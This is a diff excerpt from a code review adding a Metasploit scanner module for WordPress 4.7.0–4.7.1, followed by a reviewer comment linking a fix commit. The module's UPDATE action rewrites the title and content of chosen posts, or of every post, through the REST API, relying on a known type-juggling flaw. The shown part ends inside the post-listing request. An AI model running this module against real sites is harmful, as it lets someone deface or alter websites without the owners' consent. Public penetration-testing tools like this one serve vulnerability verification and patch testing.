modules/auxiliary/scanner/http/wp_content_injection.rb

```diff
@@ -0,0 +1,168 @@
+        ['URL', 'https://secure.php.net/manual/en/language.types.type-juggling.php']
+      ],
+      'DisclosureDate' => 'Feb 1 2017',
+      'License'        => MSF_LICENSE,
+      'Actions'        => [
+        ['LIST',   'Description' => 'List posts'],
+        ['UPDATE', 'Description' => 'Update post']
+      ],
+      'DefaultAction'  => 'LIST'
+    ))
+
+    register_options([
+      OptInt.new('POST_ID',         [false, 'Post ID (0 for all)', 0]),
+      OptString.new('POST_TITLE',   [false, 'Post title']),
+      OptString.new('POST_CONTENT', [false, 'Post content'])
+    ])
+  end
+
+  def check_host(ip)
+    version = wordpress_version
+
+    if version
+      version = Gem::Version.new(version)
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    vprint_status("WordPress #{version} detected at #{full_uri}")
+
+    if version.between?(Gem::Version.new('4.7.0'), Gem::Version.new('4.7.1'))
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Detected
+    end
+  end
+
+  def run_host(ip)
+    case action.name
+    when 'LIST'
+      posts_to_list = []
+
+      if datastore['POST_ID'] == 0
+        posts_to_list = list_posts
+      else
+        posts_to_list << list_posts.find do |post|
+          post[:id] == datastore['POST_ID']
+        end
+      end
+
+      if posts_to_list.compact.empty?
+        print_error("No posts to list at #{full_uri}")
+        return
+      end
+
+      tbl = Rex::Text::Table.new(
+        'Header'  => "Posts at #{full_uri}",
+        'Columns' => ['ID', 'Title', 'URL']
+      )
+
+      posts_to_list.each do |post|
+        tbl << [
+          post[:id],
+          Rex::Text.html_decode(post[:title]),
+          post[:url]
+        ]
+      end
+
+      print_line(tbl.to_s) if tbl.rows.count > 0
+    when 'UPDATE'
+      if datastore['POST_TITLE'].nil? && datastore['POST_CONTENT'].nil?
+        fail_with(Failure::BadConfig, 'POST_TITLE and/or POST_CONTENT not set')
+      end
+
+      posts_to_update = []
+
+      if datastore['POST_ID'] == 0
+        posts_to_update = list_posts
+      else
+        posts_to_update << list_posts.find do |post|
+          post[:id] == datastore['POST_ID']
+        end
+      end
+
+      if posts_to_update.compact.empty?
+        print_error("No posts to update at #{full_uri}")
+        return
+      end
+
+      posts_to_update.each do |post|
+        res = update_post(
+          post[:id],
+          datastore['POST_TITLE'],
+          datastore['POST_CONTENT']
+        )
+
+        if res && res.code == 200
+          print_good("Updated post ID #{post[:id]} at #{post[:url]}")
+        else
+          print_error("Failed to update post ID #{post[:id]} at #{post[:url]}")
+        end
+      end
+    end
+  end
+
+  def list_posts
+    posts = []
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(
+        target_uri.path, '/index.php/wp-json/wp/v2/posts'
```

Comment:
Fixed in https://github.com/rapid7/metasploit-framework/pull/7905/commits/3cead6c17b5b2a9858ff07715d0a3c04f0865f80.